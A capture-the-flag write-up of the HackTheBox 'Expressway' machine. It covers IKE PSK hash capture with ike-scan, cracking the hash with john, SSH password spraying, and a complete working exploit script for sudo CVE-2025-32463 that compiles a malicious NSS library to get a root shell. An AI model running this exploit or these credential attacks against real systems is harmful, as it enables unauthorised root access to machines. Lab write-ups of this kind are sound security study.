Expressway

Linux Easy Box from HackTheBox Season 9 (1/13)

Reconnaissance

As always we start off with a TCP port scan using nmap

nmap -p- --open -Pn -n --min-rate 5000 -sS -sCV -oN scanned 10.10.11.87
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-21 11:15 WEST
Nmap scan report for 10.10.11.87
Host is up (0.045s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 10.0p2 Debian 8 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.56 second

But we only see TCP Port 22 | SSH Open and if you're wondering, no, this is not a SSH 0day.

As TCP didn't show us much information, let's try and enumerate top 100 ports of the UDP protocol:

nmap -sU --top-ports 100 -T5 10.10.11.87
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-21 11:20 WEST
Warning: 10.10.11.87 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.11.87
Host is up (0.044s latency).
Not shown: 90 open|filtered udp ports (no-response)

PORT      STATE  SERVICE
500/udp   open   isakmp

Nmap done: 1 IP address (1 host up) scanned in 4.62 seconds

And now we see UDP Port 500 | isakmp open

In order to exploit this port we will be using the Hacktricks Cheatsheet

First off by scanning the version of IKE Running on the victim port

nmap -sU -p 500 --script ike-version 10.10.11.87
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-21 11:23 WEST
Nmap scan report for 10.10.11.87
Host is up (0.043s latency).

PORT    STATE SERVICE
500/udp open  isakmp
| ike-version: 
|   attributes: 
|     XAUTH
|_    Dead Peer Detection v1.0

Nmap done: 1 IP address (1 host up) scanned in 0.37 seconds

We see Dead Peer Detection v1.0 but it's not relevant for now

Exploiting 500/UDP with ike-scan

As HackTricks recommends, we can try and bruteforce the ID with ike-scan

Which we do with:

ike-scan -P -M -A -n fakeID 10.10.11.87
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87	Aggressive Mode Handshake returned
	HDR=(CKY-R=402b4bcca269dcad)
	SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
	KeyExchange(128 bytes)
	Nonce(32 bytes)
	ID(Type=ID_USER_FQDN, Value=ike@expressway.htb)
	VID=09002689dfd6b712 (XAUTH)
	VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
	Hash(20 bytes)

IKE PSK parameters (g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r):
ece674976db29bf059b9e7a916237646b42759cd23d9fc482b27adf4b1f2a7178462d43c3c759e6186941a34a386afb243e4b21231205fee32a0ef3b1a2f631bb8d30138650e53ed154b1c9e470c96d544a5d55d6e73ba8fd81699a2770c576e0ba61724c75d119df4a63f89087f5131835a271acf4fe56ccb6c6998c254b000:0e5e52e4e6af67dba88baa03126053b61abeaa45d8dd3fe8f4f7fbe7cbecdc1675293b43dbeefb7dd3eeefa23dfe8ee297296ca11be3fd50a61fd89f69e611134d49a1fa920175af7c2665606d5f8009d419c4be04d5d0b3b5bd2c9ffd59da065ce00afb8dc760c8c47c03be63c669fcbb26a9359a307a5f6518304cfec60537:402b4bcca269dcad:1703bd07611518b3:00000001000000010000009801010004030000240101000080010005800200028003000180040002800b0001000c000400007080030000240201000080010005800200018003000180040002800b0001000c000400007080030000240301000080010001800200028003000180040002800b0001000c000400007080000000240401000080010001800200018003000180040002800b0001000c000400007080:03000000696b6540657870726573737761792e687462:cae3144bff1e04eba5529b0f55714985760fc004:a5cf4634b34efa2ce3aaa2ed2d08608c160b4360a92e7d81ecb9d3c382b9d796:db8bc41ffe510780a352597640d4f1823c30bde6
Ending ike-scan 1.9.6: 1 hosts scanned in 0.081 seconds (12.34 hosts/sec).  1 returned handshake; 0 returned notify

  delorian  ~/HackTheBox/Easy/Expressway/nmap ❯                                                                                                                                                    󰍸 10.10.14.31

We successfully retrieved a hash!! Let's try and brute-force it with ikescan2john and afterwards with john

ikescan2john hash.txt > hash
john -w=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (IKE, PSK [HMAC MD5/SHA1 32/64])
Cost 1 (hash algorithm used for hmac [1:MD5 2:SHA1]) is 2 for all loaded hashes
Will run 9 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
freakingrockstarontheroad (?)     
1g 0:00:00:01 DONE (2025-09-21 11:30) 0.8695g/s 6996Kp/s 6996Kc/s 6996KC/s freaksrock123..franzmatthew
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

We retrieve the following password freakingrockstarontheroad which we are going to password spray with some users I have in mind:

user
admin
root
iker
ike

And after password spraying, we have success with the ike account through SSH

ssh ike@10.10.11.87
ike@10.10.11.87's password: 
Last login: Sun Sep 21 10:13:06 BST 2025 from 10.10.14.3 on ssh
Linux expressway.htb 6.16.7+deb14-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.16.7-1 (2025-09-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Sep 21 11:31:23 2025 from 10.10.14.31
ike@expressway:~$ 

Privilege Escalation

We start off by enumerating the groups we are in and if we got sudo capabilities

ike@expressway:~$ id
uid=1001(ike) gid=1001(ike) groups=1001(ike),13(proxy)
ike@expressway:~$ sudo -l
Password: 
Sorry, user ike may not run sudo on expressway.
ike@expressway:~$ 

But we see this doesn't lead to anything, so let's enumerate interesting files with SUID capabilities and misconfigured cron jobs

ike@expressway:~$ find / -perm -4000 -ls 2>/dev/null
   286198   1500 -rwsr-xr-x   1 root     root      1533496 Aug 14 12:58 /usr/sbin/exim4
   275230   1024 -rwsr-xr-x   1 root     root      1047040 Aug 29 15:18 /usr/local/bin/sudo
   262859    116 -rwsr-xr-x   1 root     root       118168 Aug 26 22:05 /usr/bin/passwd
   260733     76 -rwsr-xr-x   1 root     root        76240 Sep  9 10:09 /usr/bin/mount
   262858     88 -rwsr-xr-x   1 root     root        88568 Aug 26 22:05 /usr/bin/gpasswd
   275693     92 -rwsr-xr-x   1 root     root        92624 Sep  9 10:09 /usr/bin/su
   264516    276 -rwsr-xr-x   1 root     root       281624 Jun 27  2023 /usr/bin/sudo
   260734     64 -rwsr-xr-x   1 root     root        63952 Sep  9 10:09 /usr/bin/umount
   262855     72 -rwsr-xr-x   1 root     root        70888 Aug 26 22:05 /usr/bin/chfn
   262856     52 -rwsr-xr-x   1 root     root        52936 Aug 26 22:05 /usr/bin/chsh
   263438     20 -rwsr-xr-x   1 root     root        18888 Sep  9 10:09 /usr/bin/newgrp
   262814     52 -rwsr-xr--   1 root     messagebus    51272 Mar  8  2025 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
   265222    484 -rwsr-xr-x   1 root     root         494144 Aug 10 00:07 /usr/lib/openssh/ssh-keysign
     5397     16 -r-sr-xr-x   1 root     root          13712 Aug 28 09:04 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
     5391     16 -r-sr-xr-x   1 root     root          14416 Aug 28 09:04 /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
ike@expressway:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
17 *	* * *	root	cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.daily; }
47 6	* * 7	root	test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.weekly; }
52 6	1 * *	root	test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.monthly; }
#
ike@expressway:~$ 

But nothing interesting here neither, let's enumerate the sudo version

ike@expressway:~$ sudo --version
Sudo version 1.9.17
Sudoers policy plugin version 1.9.17
Sudoers file grammar version 50
Sudoers I/O plugin version 1.9.17
Sudoers audit plugin version 1.9.17
ike@expressway:~$ 

After researching in google, we see that this is vulnerable to CVE-2025-32463 with the following exploit:

#!/bin/bash
# sudo-chwoot.sh – PoC CVE-2025-32463
set -e

STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd "$STAGE"

# 1. NSS library
cat > woot1337.c <<'EOF'
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor))
void woot(void) {
    setreuid(0,0);          /* change to UID 0 */
    setregid(0,0);          /* change  to GID 0 */
    chdir("/");             /* exit from chroot */
    execl("/bin/bash","/bin/bash",NULL); /* root shell */
}
EOF

# 2. Mini chroot with toxic nsswitch.conf
mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc            # make getgrnam() not fail

# 3. compile libnss_
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c

echo "[*] Running exploit…"
sudo -R woot woot                 # (-R <dir> <cmd>)
                                   # • the first “woot” is chroot
                                   # • the second “woot” is and inexistent
command
                                   #   (only needs resolve the user)

rm -rf "$STAGE"

We run the exploit...

ike@expressway:~$ bash exploit.sh 
[*] Running exploit…
root@expressway:/# 

And we successfully got root!!